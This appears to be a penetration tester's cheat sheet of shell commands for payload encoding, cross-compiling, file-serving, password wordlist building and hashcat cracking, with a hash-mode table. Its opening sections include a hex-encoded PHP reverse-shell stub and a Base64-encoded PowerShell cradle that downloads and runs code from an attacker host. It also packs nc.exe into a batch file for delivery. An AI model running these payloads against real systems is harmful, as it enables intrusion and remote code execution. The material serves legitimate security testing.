`` Compression
~$ 7z a -t7z -m0=lzma2 -mx=9 -mfb=64 -md=32m -ms=on -mhe=on -p archive.7z ./directory/
`` Convert raw payload to comma separated hex
~$ hexdump -ve '1/1 ",0x%02x"' payload.raw | sed "s/^,//" > payload.txt
`` Convert payload to hex
~$ echo '<?php $sock=fsock[...]$pipes); ?>' | xxd -ps | tr -d '\n'
# 3c3f70...
~$ echo 3c3f70... | xxd -ps -r
`` Powershell
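`` Base64 encoding (over the UTF-16LE bytes of the string; decode with the same encoding when reviewing an encoded string)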
~PS> $text = "(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/run.txt') | IEX"
~PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
~PS> $EncodedText = [Convert]::ToBase64String($bytes)
~PS> $EncodedText
`` Sources
`` Update all Git repositories below the current directory (git reset --hard discards uncommitted changes in each one)
~$ export TMPPWD=$PWD; export GIT_ASKPASS=echo; for x in $(find . -name '.git' -type d | xargs -n 1 dirname); do cd $TMPPWD; cd $x; echo -e "\n\n--> $(pwd)"; git reset --hard; git remote prune origin; git pull; done; cd $TMPPWD
`` diff
~$ icdiff --strip-trailing-cr -H *.c
`` gcc
`` Compiling for GNU/Linux
~$ gcc -shared source.c -o executable
~$ gcc -static source.c -o executable
~$ gcc -m32 source.c -o executable
~$ gcc -m32 source.c -o executable -Wl,--hash-style=both
`` Compiling for Windows
~$ i686-w64-mingw32-gcc -lws2_32 -o executable source.c
~$ i686-w64-mingw32-gcc -o executable source.c
`` All .c files in current directory (dry run: prints the gcc commands; drop the echo to compile)
~$ for fil in $(ls *.c); do echo gcc -o ${fil::${#fil}-2} $fil; done
`` Java
`` Signing applets
~$ javac -source 1.7 -target 1.7 Java.java
~$ echo "Permissions: all-permissions" > manifest.txt
~$ jar cvf Java.jar Java.class
~$ jarsigner -keystore mykeystore -storepass secret -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet
~$ keytool -genkey -alias signapplet -keystore mykeystore -keypass secret -storepass secret
~$ keytool -list -v -keystore mykeystore
~$ jarsigner -keystore mykeystore -storepass secret -keypass secret -signedjar SignedJava.jar Java.jar signapplet
`` Packing
`` Python to EXE
~$ python pyinstaller.py --onefile exploit.py
`` EXE to BAT
~$ cp /usr/share/windows-binaries/nc.exe ./nc.exe
~$ upx -9 nc.exe
~$ wine /usr/share/windows-binaries/exe2bat.exe nc.exe nc.txt
`` Servers
`` HTTP
`` socat
~$ socat TCP-LISTEN:8000,crlf SYSTEM:"echo HTTP/1.0 200; echo Content-Type\: text/plain; echo; cat"
`` Python
~$ python2 -m SimpleHTTPServer
~$ python3 -m http.server
`` Python IPv6
~$ echo -e 'import BaseHTTPServer\nimport SimpleHTTPServer\nimport socket\nclass HTTPServer6(BaseHTTPServer.HTTPServer):\n address_family = socket.AF_INET6\nif __name__ == "__main__":\n SimpleHTTPServer.test(ServerClass=HTTPServer6)' | python2
`` Ruby
~$ ruby -r webrick -e "WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start"
`` PHP
~$ php -S 0.0.0.0:8000
`` Perl
~$ cpan HTTP::Server::Brick
~$ perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>8000); $s->mount("/"=>{path=>"."}); $s->start'
`` FTP
~$ python -m pyftpdlib -p 21 -w
`` SMB
~$ sudo impacket-smbserver.py TEST .
`` TFTP
`` Server
~$ atftpd --daemon --port 69 /tftp
`` Client
~$ tftp -i VAR_TARGET_HOST GET nc.exe
`` SMTP
`` Server
~$ socat - TCP-LISTEN:25,crlf
~$ socat readline TCP-LISTEN:25,crlf
`` Local delivery
~$ socat UNIX-LISTEN:/tmp/mail,fork,perm-early=0666 exec:"/usr/sbin/sendmail -bs"
~$ socat - /tmp/mail
`` Python
~# python -m smtpd -n -c DebuggingServer 0.0.0.0:25
`` IP
`` Conversion
172.217.16.14
((172 * 256 + 217) * 256 + 16 ) * 256 + 14 = 2899906574 = 0xacd9100e
127.0.0.1 == 2130706433 == 7F000001 == 1111111000000000000000000000001 == 017700000001
`` What is my IP?
~$ curl -s https://api.ipify.org
`` File analysis
~$ file executable
~$ binwalk executable
~$ foremost executable
`` Passwords
`` Combining
~$ /usr/share/hashcat-utils/combinator.bin wordlist wordlist > combined
~$ crunch 1 2 -p combine couple words > combined
`` Wordlists
~$ cewl http://VAR_TARGET_HOST -d 1 -m 6 -w wordlist
`` Extract last column separated by :
~$ cat VAR_FILE | grep -o '[^:]*$'
`` Length
~$ awk 'length($0)>4 && length($0)<12' unique > final
`` Lower case and keep letters only
~$ awk '{print tolower($0)}' VAR_FILE | tr -d '[0-9]' | tr -d '[:punct:]'
`` Most frequent words
~$ cat VAR_FILE | sort | uniq -c | sort -nr | head -n 1000
`` Keep only the lines unique to sorted2
~$ comm -13 sorted1 sorted2 > sorted3
`` Lines less than 21 chars and remove e-mail addresses
~$ awk 'length($0)<21' VAR_FILE | grep -vaEih '([[:alnum:]_.-]+@[[:alnum:]_.-]+?\.[[:alpha:].]{2,6})'
`` Sort by line length
~$ cat VAR_FILE | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2-
`` Sorting large password list by count
~$ sort --compress-program=lzop VAR_FILE --parallel 8 | uniq -c | sort --compress-program=lzop --parallel 8 -nr
`` Remove preceding spaces
~$ sed 's/^ *//g' VAR_FILE
`` Remove preceding numbers
~$ cut -d" " -f2- VAR_FILE
`` Splitting lists by group/column selection
-- Ex. "22 username;password" or "12 password:password1"
-- On macOS use sed -nE instead of -nr
~$ sed -nr 's/(.*)[[:space:]](.*);(.*)/\1 \2/p' VAR_FILE
`` Removing duplicates based on second column with a single space delimiter (useful with uniq -c)
~$ sort -u -t' ' -k2,2 VAR_FILE
`` Remove all lines containing control characters, DEL or non-ASCII bytes (printable ASCII lines, including punctuation, are kept)
-- For macOS use pcregrep (homebrew/pcre)
~$ LC_ALL=C grep -Pv "[\x00-\x08\x0A-\x1F\x7F-\xFF]" VAR_FILE
`` Remove all lines with control characters
-- For macOS use pcregrep (homebrew/pcre)
~$ LC_ALL=C grep -Pv "[\x00-\x08\x0B\x0C\x0E-\x1F]" VAR_FILE
`` Permutations
~$ crunch 4 8 > wordlist
~$ hashcat -r /usr/share/hashcat/rules/hybrid/append_ldus.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/hybrid/prepend_ldus.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/combinator.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/best64.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/T0XlCv1.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/unix-ninja-leetspeak.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/rockyou-30000.rule --stdout wordlist >> permuted
~$ sort permuted | uniq > unique
`` Hashcat modes
# | Name | Category
======+==================================================+======================================
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
100 | SHA1 | Raw Hash
1300 | SHA2-224 | Raw Hash
1400 | SHA2-256 | Raw Hash
10800 | SHA2-384 | Raw Hash
1700 | SHA2-512 | Raw Hash
17300 | SHA3-224 | Raw Hash
17400 | SHA3-256 | Raw Hash
17500 | SHA3-384 | Raw Hash
17600 | SHA3-512 | Raw Hash
6000 | RIPEMD-160 | Raw Hash
600 | BLAKE2b-512 | Raw Hash
11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian | Raw Hash
11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian | Raw Hash
6900 | GOST R 34.11-94 | Raw Hash
5100 | Half MD5 | Raw Hash
18700 | Java Object hashCode() | Raw Hash
17700 | Keccak-224 | Raw Hash
17800 | Keccak-256 | Raw Hash
17900 | Keccak-384 | Raw Hash
18000 | Keccak-512 | Raw Hash
21400 | sha256(sha256_bin($pass)) | Raw Hash
6100 | Whirlpool | Raw Hash
10100 | SipHash | Raw Hash
21000 | BitShares v0.x - sha512(sha512_bin(pass)) | Raw Hash
10 | md5($pass.$salt) | Raw Hash, Salted and/or Iterated
20 | md5($salt.$pass) | Raw Hash, Salted and/or Iterated
3800 | md5($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated
3710 | md5($salt.md5($pass)) | Raw Hash, Salted and/or Iterated
4110 | md5($salt.md5($pass.$salt)) | Raw Hash, Salted and/or Iterated
4010 | md5($salt.md5($salt.$pass)) | Raw Hash, Salted and/or Iterated
21300 | md5($salt.sha1($salt.$pass)) | Raw Hash, Salted and/or Iterated
40 | md5($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
2600 | md5(md5($pass)) | Raw Hash, Salted and/or Iterated
3910 | md5(md5($pass).md5($salt)) | Raw Hash, Salted and/or Iterated
4400 | md5(sha1($pass)) | Raw Hash, Salted and/or Iterated
20900 | md5(sha1($pass).md5($pass).sha1($pass)) | Raw Hash, Salted and/or Iterated
21200 | md5(sha1($salt).md5($pass)) | Raw Hash, Salted and/or Iterated
4300 | md5(strtoupper(md5($pass))) | Raw Hash, Salted and/or Iterated
30 | md5(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
110 | sha1($pass.$salt) | Raw Hash, Salted and/or Iterated
120 | sha1($salt.$pass) | Raw Hash, Salted and/or Iterated
4900 | sha1($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated
4520 | sha1($salt.sha1($pass)) | Raw Hash, Salted and/or Iterated
140 | sha1($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
19300 | sha1($salt1.$pass.$salt2) | Raw Hash, Salted and/or Iterated
14400 | sha1(CX) | Raw Hash, Salted and/or Iterated
4700 | sha1(md5($pass)) | Raw Hash, Salted and/or Iterated
4710 | sha1(md5($pass).$salt) | Raw Hash, Salted and/or Iterated
21100 | sha1(md5($pass.$salt)) | Raw Hash, Salted and/or Iterated
18500 | sha1(md5(md5($pass))) | Raw Hash, Salted and/or Iterated
4500 | sha1(sha1($pass)) | Raw Hash, Salted and/or Iterated
130 | sha1(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
1410 | sha256($pass.$salt) | Raw Hash, Salted and/or Iterated
1420 | sha256($salt.$pass) | Raw Hash, Salted and/or Iterated
22300 | sha256($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated
1440 | sha256($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
20800 | sha256(md5($pass)) | Raw Hash, Salted and/or Iterated
20710 | sha256(sha256($pass).$salt) | Raw Hash, Salted and/or Iterated
1430 | sha256(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
1710 | sha512($pass.$salt) | Raw Hash, Salted and/or Iterated
1720 | sha512($salt.$pass) | Raw Hash, Salted and/or Iterated
1740 | sha512($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
1730 | sha512(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
19500 | Ruby on Rails Restful-Authentication | Raw Hash, Salted and/or Iterated
50 | HMAC-MD5 (key = $pass) | Raw Hash, Authenticated
60 | HMAC-MD5 (key = $salt) | Raw Hash, Authenticated
150 | HMAC-SHA1 (key = $pass) | Raw Hash, Authenticated
160 | HMAC-SHA1 (key = $salt) | Raw Hash, Authenticated
1450 | HMAC-SHA256 (key = $pass) | Raw Hash, Authenticated
1460 | HMAC-SHA256 (key = $salt) | Raw Hash, Authenticated
1750 | HMAC-SHA512 (key = $pass) | Raw Hash, Authenticated
1760 | HMAC-SHA512 (key = $salt) | Raw Hash, Authenticated
11750 | HMAC-Streebog-256 (key = $pass), big-endian | Raw Hash, Authenticated
11760 | HMAC-Streebog-256 (key = $salt), big-endian | Raw Hash, Authenticated
11850 | HMAC-Streebog-512 (key = $pass), big-endian | Raw Hash, Authenticated
11860 | HMAC-Streebog-512 (key = $salt), big-endian | Raw Hash, Authenticated
11500 | CRC32 | Raw Checksum
14100 | 3DES (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack
14000 | DES (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack
15400 | ChaCha20 | Raw Cipher, Known-Plaintext attack
14900 | Skip32 (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack
11900 | PBKDF2-HMAC-MD5 | Generic KDF
12000 | PBKDF2-HMAC-SHA1 | Generic KDF
10900 | PBKDF2-HMAC-SHA256 | Generic KDF
12100 | PBKDF2-HMAC-SHA512 | Generic KDF
8900 | scrypt | Generic KDF
400 | phpass | Generic KDF
16900 | Ansible Vault | Generic KDF
12001 | Atlassian (PBKDF2-HMAC-SHA1) | Generic KDF
20200 | Python passlib pbkdf2-sha512 | Generic KDF
20300 | Python passlib pbkdf2-sha256 | Generic KDF
20400 | Python passlib pbkdf2-sha1 | Generic KDF
16100 | TACACS+ | Network Protocols
11400 | SIP digest authentication (MD5) | Network Protocols
5300 | IKE-PSK MD5 | Network Protocols
5400 | IKE-PSK SHA1 | Network Protocols
2500 | WPA-EAPOL-PBKDF2 | Network Protocols
2501 | WPA-EAPOL-PMK | Network Protocols
22000 | WPA-PBKDF2-PMKID+EAPOL | Network Protocols
22001 | WPA-PMK-PMKID+EAPOL | Network Protocols
16800 | WPA-PMKID-PBKDF2 | Network Protocols
16801 | WPA-PMKID-PMK | Network Protocols
7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocols
10200 | CRAM-MD5 | Network Protocols
4800 | iSCSI CHAP authentication, MD5(CHAP) | Network Protocols
16500 | JWT (JSON Web Token) | Network Protocols
22600 | Telegram Desktop App Passcode (PBKDF2-HMAC-SHA1) | Network Protocols
22301 | Telegram Mobile App Passcode (SHA256) | Network Protocols
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocols
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocols
18200 | Kerberos 5, etype 23, AS-REP | Network Protocols
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocols
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocols
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocols
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocols
5500 | NetNTLMv1 / NetNTLMv1+ESS | Network Protocols
5600 | NetNTLMv2 | Network Protocols
23 | Skype | Network Protocols
11100 | PostgreSQL CRAM (MD5) | Network Protocols
11200 | MySQL CRAM (SHA1) | Network Protocols
8500 | RACF | Operating System
6300 | AIX {smd5} | Operating System
6700 | AIX {ssha1} | Operating System
6400 | AIX {ssha256} | Operating System
6500 | AIX {ssha512} | Operating System
3000 | LM | Operating System
19000 | QNX /etc/shadow (MD5) | Operating System
19100 | QNX /etc/shadow (SHA256) | Operating System
19200 | QNX /etc/shadow (SHA512) | Operating System
15300 | DPAPI masterkey file v1 | Operating System
15900 | DPAPI masterkey file v2 | Operating System
7200 | GRUB 2 | Operating System
12800 | MS-AzureSync PBKDF2-HMAC-SHA256 | Operating System
12400 | BSDi Crypt, Extended DES | Operating System
1000 | NTLM | Operating System
122 | macOS v10.4, macOS v10.5, MacOS v10.6 | Operating System
1722 | macOS v10.7 | Operating System
7100 | macOS v10.8+ (PBKDF2-SHA512) | Operating System
9900 | Radmin2 | Operating System
5800 | Samsung Android Password/PIN | Operating System
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) | Operating System
1500 | descrypt, DES (Unix), Traditional DES | Operating System
7400 | sha256crypt $5$, SHA256 (Unix) | Operating System
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
13800 | Windows Phone 8+ PIN/password | Operating System
2410 | Cisco-ASA MD5 | Operating System
9200 | Cisco-IOS $8$ (PBKDF2-SHA256) | Operating System
9300 | Cisco-IOS $9$ (scrypt) | Operating System
5700 | Cisco-IOS type 4 (SHA256) | Operating System
2400 | Cisco-PIX MD5 | Operating System
8100 | Citrix NetScaler (SHA1) | Operating System
22200 | Citrix NetScaler (SHA512) | Operating System
1100 | Domain Cached Credentials (DCC), MS Cache | Operating System
2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2 | Operating System
7000 | FortiGate (FortiOS) | Operating System
125 | ArubaOS | Operating System
501 | Juniper IVE | Operating System
22 | Juniper NetScreen/SSG (ScreenOS) | Operating System
15100 | Juniper/NetBSD sha1crypt | Operating System
131 | MSSQL (2000) | Database Server
132 | MSSQL (2005) | Database Server
1731 | MSSQL (2012, 2014) | Database Server
12 | PostgreSQL | Database Server
3100 | Oracle H: Type (Oracle 7+) | Database Server
112 | Oracle S: Type (Oracle 11+) | Database Server
12300 | Oracle T: Type (Oracle 12+) | Database Server
7401 | MySQL $A$ (sha256crypt) | Database Server
200 | MySQL323 | Database Server
300 | MySQL4.1/MySQL5 | Database Server
8000 | Sybase ASE | Database Server
1421 | hMailServer | FTP, HTTP, SMTP, LDAP Server
8300 | DNSSEC (NSEC3) | FTP, HTTP, SMTP, LDAP Server
16400 | CRAM-MD5 Dovecot | FTP, HTTP, SMTP, LDAP Server
1411 | SSHA-256(Base64), LDAP {SSHA256} | FTP, HTTP, SMTP, LDAP Server
1711 | SSHA-512(Base64), LDAP {SSHA512} | FTP, HTTP, SMTP, LDAP Server
10901 | RedHat 389-DS LDAP (PBKDF2-HMAC-SHA256) | FTP, HTTP, SMTP, LDAP Server
15000 | FileZilla Server >= 0.9.55 | FTP, HTTP, SMTP, LDAP Server
12600 | ColdFusion 10+ | FTP, HTTP, SMTP, LDAP Server
1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) | FTP, HTTP, SMTP, LDAP Server
141 | Episerver 6.x < .NET 4 | FTP, HTTP, SMTP, LDAP Server
1441 | Episerver 6.x >= .NET 4 | FTP, HTTP, SMTP, LDAP Server
101 | nsldap, SHA-1(Base64), Netscape LDAP SHA | FTP, HTTP, SMTP, LDAP Server
111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA | FTP, HTTP, SMTP, LDAP Server
7700 | SAP CODVN B (BCODE) | Enterprise Application Software (EAS)
7701 | SAP CODVN B (BCODE) from RFC_READ_TABLE | Enterprise Application Software (EAS)
7800 | SAP CODVN F/G (PASSCODE) | Enterprise Application Software (EAS)
7801 | SAP CODVN F/G (PASSCODE) from RFC_READ_TABLE | Enterprise Application Software (EAS)
10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1 | Enterprise Application Software (EAS)
133 | PeopleSoft | Enterprise Application Software (EAS)
13500 | PeopleSoft PS_TOKEN | Enterprise Application Software (EAS)
21500 | SolarWinds Orion | Enterprise Application Software (EAS)
8600 | Lotus Notes/Domino 5 | Enterprise Application Software (EAS)
8700 | Lotus Notes/Domino 6 | Enterprise Application Software (EAS)
9100 | Lotus Notes/Domino 8 | Enterprise Application Software (EAS)
20600 | Oracle Transportation Management (SHA256) | Enterprise Application Software (EAS)
4711 | Huawei sha1(md5($pass).$salt) | Enterprise Application Software (EAS)
20711 | AuthMe sha256 | Enterprise Application Software (EAS)
12200 | eCryptfs | Full-Disk Encryption (FDE)
22400 | AES Crypt (SHA256) | Full-Disk Encryption (FDE)
14600 | LUKS | Full-Disk Encryption (FDE)
13711 | VeraCrypt RIPEMD160 + XTS 512 bit | Full-Disk Encryption (FDE)
13712 | VeraCrypt RIPEMD160 + XTS 1024 bit | Full-Disk Encryption (FDE)
13713 | VeraCrypt RIPEMD160 + XTS 1536 bit | Full-Disk Encryption (FDE)
13741 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)
13742 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)
13743 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)
13751 | VeraCrypt SHA256 + XTS 512 bit | Full-Disk Encryption (FDE)
13752 | VeraCrypt SHA256 + XTS 1024 bit | Full-Disk Encryption (FDE)
13753 | VeraCrypt SHA256 + XTS 1536 bit | Full-Disk Encryption (FDE)
13761 | VeraCrypt SHA256 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)
13762 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)
13763 | VeraCrypt SHA256 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)
13721 | VeraCrypt SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)
13722 | VeraCrypt SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)
13723 | VeraCrypt SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)
13771 | VeraCrypt Streebog-512 + XTS 512 bit | Full-Disk Encryption (FDE)
13772 | VeraCrypt Streebog-512 + XTS 1024 bit | Full-Disk Encryption (FDE)
13773 | VeraCrypt Streebog-512 + XTS 1536 bit | Full-Disk Encryption (FDE)
13731 | VeraCrypt Whirlpool + XTS 512 bit | Full-Disk Encryption (FDE)
13732 | VeraCrypt Whirlpool + XTS 1024 bit | Full-Disk Encryption (FDE)
13733 | VeraCrypt Whirlpool + XTS 1536 bit | Full-Disk Encryption (FDE)
16700 | FileVault 2 | Full-Disk Encryption (FDE)
20011 | DiskCryptor SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)
20012 | DiskCryptor SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)
20013 | DiskCryptor SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)
22100 | BitLocker | Full-Disk Encryption (FDE)
12900 | Android FDE (Samsung DEK) | Full-Disk Encryption (FDE)
8800 | Android FDE <= 4.3 | Full-Disk Encryption (FDE)
18300 | Apple File System (APFS) | Full-Disk Encryption (FDE)
6211 | TrueCrypt RIPEMD160 + XTS 512 bit | Full-Disk Encryption (FDE)
6212 | TrueCrypt RIPEMD160 + XTS 1024 bit | Full-Disk Encryption (FDE)
6213 | TrueCrypt RIPEMD160 + XTS 1536 bit | Full-Disk Encryption (FDE)
6241 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)
6242 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)
6243 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)
6221 | TrueCrypt SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)
6222 | TrueCrypt SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)
6223 | TrueCrypt SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)
6231 | TrueCrypt Whirlpool + XTS 512 bit | Full-Disk Encryption (FDE)
6232 | TrueCrypt Whirlpool + XTS 1024 bit | Full-Disk Encryption (FDE)
6233 | TrueCrypt Whirlpool + XTS 1536 bit | Full-Disk Encryption (FDE)
10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4) | Documents
10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1 | Documents
10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2 | Documents
10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8) | Documents
10600 | PDF 1.7 Level 3 (Acrobat 9) | Documents
10700 | PDF 1.7 Level 8 (Acrobat 10 - 11) | Documents
9400 | MS Office 2007 | Documents
9500 | MS Office 2010 | Documents
9600 | MS Office 2013 | Documents
9700 | MS Office <= 2003 $0/$1, MD5 + RC4 | Documents
9710 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #1 | Documents
9720 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #2 | Documents
9800 | MS Office <= 2003 $3/$4, SHA1 + RC4 | Documents
9810 | MS Office <= 2003 $3, SHA1 + RC4, collider #1 | Documents
9820 | MS Office <= 2003 $3, SHA1 + RC4, collider #2 | Documents
18400 | Open Document Format (ODF) 1.2 (SHA-256, AES) | Documents
18600 | Open Document Format (ODF) 1.1 (SHA-1, Blowfish) | Documents
16200 | Apple Secure Notes | Documents
15500 | JKS Java Key Store Private Keys (SHA1) | Password Managers
6600 | 1Password, agilekeychain | Password Managers
8200 | 1Password, cloudkeychain | Password Managers
9000 | Password Safe v2 | Password Managers
5200 | Password Safe v3 | Password Managers
6800 | LastPass + LastPass sniffed | Password Managers
13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) | Password Managers
11300 | Bitcoin/Litecoin wallet.dat | Password Managers
16600 | Electrum Wallet (Salt-Type 1-3) | Password Managers
21700 | Electrum Wallet (Salt-Type 4) | Password Managers
21800 | Electrum Wallet (Salt-Type 5) | Password Managers
12700 | Blockchain, My Wallet | Password Managers
15200 | Blockchain, My Wallet, V2 | Password Managers
18800 | Blockchain, My Wallet, Second Password (SHA256) | Password Managers
16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256 | Password Managers
15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256 | Password Managers
15700 | Ethereum Wallet, SCRYPT | Password Managers
22500 | MultiBit Classic .key (MD5) | Password Managers
11600 | 7-Zip | Archives
12500 | RAR3-hp | Archives
13000 | RAR5 | Archives
17200 | PKZIP (Compressed) | Archives
17220 | PKZIP (Compressed Multi-File) | Archives
17225 | PKZIP (Mixed Multi-File) | Archives
17230 | PKZIP (Mixed Multi-File Checksum-Only) | Archives
17210 | PKZIP (Uncompressed) | Archives
20500 | PKZIP Master Key | Archives
20510 | PKZIP Master Key (6 byte optimization) | Archives
14700 | iTunes backup < 10.0 | Archives
14800 | iTunes backup >= 10.0 | Archives
13600 | WinZip | Archives
18900 | Android Backup | Archives
13200 | AxCrypt | Archives
13300 | AxCrypt in-memory SHA1 | Archives
8400 | WBB3 (Woltlab Burning Board) | Forums, CMS, E-Commerce
2611 | vBulletin < v3.8.5 | Forums, CMS, E-Commerce
2711 | vBulletin >= v3.8.5 | Forums, CMS, E-Commerce
2612 | PHPS | Forums, CMS, E-Commerce
121 | SMF (Simple Machines Forum) > v1.1 | Forums, CMS, E-Commerce
3711 | MediaWiki B type | Forums, CMS, E-Commerce
4521 | Redmine | Forums, CMS, E-Commerce
11 | Joomla < 2.5.18 | Forums, CMS, E-Commerce
13900 | OpenCart | Forums, CMS, E-Commerce
11000 | PrestaShop | Forums, CMS, E-Commerce
16000 | Tripcode | Forums, CMS, E-Commerce
7900 | Drupal7 | Forums, CMS, E-Commerce
21 | osCommerce, xt:Commerce | Forums, CMS, E-Commerce
4522 | PunBB | Forums, CMS, E-Commerce
2811 | MyBB 1.2+, IPB2+ (Invision Power Board) | Forums, CMS, E-Commerce
18100 | TOTP (HMAC-SHA1) | One-Time Passwords
2000 | STDOUT | Plaintext
99999 | Plaintext | Plaintext
21600 | Web2py pbkdf2-sha512 | Framework
10000 | Django (PBKDF2-SHA256) | Framework
124 | Django (SHA-1) | Framework
`` Nmap
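-- Check if port 8443 is in top 500 ports (approximate: nmap-services lists TCP and UDP entries together, and grep also matches ports that merely contain 8443)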
~$ sort -r -k3 /usr/share/nmap/nmap-services | head -n 500 | grep 8443
-- How many top ports are needed to include 9443?
~$ sort -r -k3 /usr/share/nmap/nmap-services | grep -n 9443
`` Misc
`` Disable sleep and hibernate
~# systemctl mask sleep.target suspend.target hibernate.target hybrid-sleep.target
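`` ASCII / Windows-1252 byte table (rows 128-255 are single-byte Windows-1252 values; UTF-8 percent-encodes those characters as multiple bytes)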
character encoding decimal
NULL %00 0
%01 1
%02 2
%03 3
%04 4
%05 5
%06 6
%07 7
%08 8
TAB %09 9
LF %0A 10
%0B 11
%0C 12
CR %0D 13
%0E 14
%0F 15
%10 16
%11 17
%12 18
%13 19
%14 20
%15 21
%16 22
%17 23
%18 24
%19 25
%1A 26
%1B 27
%1C 28
%1D 29
%1E 30
%1F 31
SPACE %20 32
! %21 33
" %22 34
# %23 35
$ %24 36
% %25 37
& %26 38
' %27 39
( %28 40
) %29 41
* %2A 42
+ %2B 43
, %2C 44
- %2D 45
. %2E 46
/ %2F 47
0 %30 48
1 %31 49
2 %32 50
3 %33 51
4 %34 52
5 %35 53
6 %36 54
7 %37 55
8 %38 56
9 %39 57
: %3A 58
; %3B 59
< %3C 60
= %3D 61
> %3E 62
? %3F 63
@ %40 64
A %41 65
B %42 66
C %43 67
D %44 68
E %45 69
F %46 70
G %47 71
H %48 72
I %49 73
J %4A 74
K %4B 75
L %4C 76
M %4D 77
N %4E 78
O %4F 79
P %50 80
Q %51 81
R %52 82
S %53 83
T %54 84
U %55 85
V %56 86
W %57 87
X %58 88
Y %59 89
Z %5A 90
[ %5B 91
\ %5C 92
] %5D 93
^ %5E 94
_ %5F 95
` %60 96
a %61 97
b %62 98
c %63 99
d %64 100
e %65 101
f %66 102
g %67 103
h %68 104
i %69 105
j %6A 106
k %6B 107
l %6C 108
m %6D 109
n %6E 110
o %6F 111
p %70 112
q %71 113
r %72 114
s %73 115
t %74 116
u %75 117
v %76 118
w %77 119
x %78 120
y %79 121
z %7A 122
{ %7B 123
| %7C 124
} %7D 125
~ %7E 126
DEL %7F 127
€ %80 128
%81 129
‚ %82 130
ƒ %83 131
„ %84 132
… %85 133
† %86 134
‡ %87 135
ˆ %88 136
‰ %89 137
Š %8A 138
‹ %8B 139
Œ %8C 140
%8D 141
Ž %8E 142
%8F 143
%90 144
‘ %91 145
’ %92 146
“ %93 147
” %94 148
• %95 149
– %96 150
— %97 151
˜ %98 152
™ %99 153
š %9A 154
› %9B 155
œ %9C 156
%9D 157
ž %9E 158
Ÿ %9F 159
%A0 160
¡ %A1 161
¢ %A2 162
£ %A3 163
¤ %A4 164
¥ %A5 165
¦ %A6 166
§ %A7 167
¨ %A8 168
© %A9 169
ª %AA 170
« %AB 171
¬ %AC 172
%AD 173
® %AE 174
¯ %AF 175
° %B0 176
± %B1 177
² %B2 178
³ %B3 179
´ %B4 180
µ %B5 181
¶ %B6 182
· %B7 183
¸ %B8 184
¹ %B9 185
º %BA 186
» %BB 187
¼ %BC 188
½ %BD 189
¾ %BE 190
